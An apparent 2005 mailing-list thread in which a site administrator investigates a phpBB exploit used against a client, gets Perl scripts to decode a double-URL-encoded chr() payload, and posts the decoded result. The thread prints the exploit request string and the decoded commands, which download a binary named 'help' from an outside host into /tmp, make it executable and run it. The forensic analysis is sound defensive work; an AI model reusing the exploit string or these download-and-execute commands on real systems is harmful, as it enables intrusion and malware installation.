David Dorward wrote:
On Tue, 25 Jan 2005 19:16:14 +0800, Franki <franki@htmlfixit.com> wrote:A client of mine was hacked using a phpbb exploit.%2527%252esystem(chr(101)Does anyone know of a perl script or something that can convert this back to a string of human readable shell commands??Its double URL encoded with a bunch of decimal chr commands, this should get you started: #!/usr/bin/perl use strict; use warnings; my $string = "viewtopic.php?t=509&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)+%252echr(111)%252echr(32"; $string =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/eg; # Deurlencode $string =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/eg; # Twice $string =~ s/chr\((\d*)\)/chr($1)/eg; # Convert chr commands to their output print $string , "\n";
Thanks for that David,After posting the email, one of my 200 google searches paid off, and I found this little snippet:
perl -e 'while (<>) { chomp ($t .= $_) }; print "\nString:\n";
while ($t =~ /chr\((\d+)\)/) { print chr $1; $t =~ s/chr\($1\)//; }'
Running it on the url string in question translated to:
echo uncomeco;
mkdir /tmp/.help;
wget -O /tmp/.help/help http://www.angelfire.com/dc2/uncanny5/help;
cd /tmp/.help;
chmod +x help;
./help;
echo unfim
So apparently they installed a binary called "help" into the temp dir
and made it executable.
Your scritpt gave much the same translation, except yours looked like this:viewtopic.php?t=509&highlight='.system(e.c.h.o. .u%2 en.c.o.m.e.c.o.;.m.k .d.i.r. ./.t.m.p./.. .h.e.l.p. .;. .w.g.e .t. .-.O. ./.t.m.p./%2 e..h.e.l.p./.h.e.l.p . .h.t.t.p.:././.w.w .w...a.n.g.e.l.f.i.r .e...c.o.m./.d.c.2./ .u.n.c.a.n.n.y.5./.h .e.l.p. .;. .c.d. ./ .t.m.p./...h.e.l.p. .;. .c.h.m.o.d. .+.x . .h.e.l.p. .;. .../ .h.e.l.p.;.e.c.h.o. .u.n.f.i.m).'
:-)Anyone know what the echo commands achieve? echo uncomeco; and echo unfim.
Thanks again Rgds Franki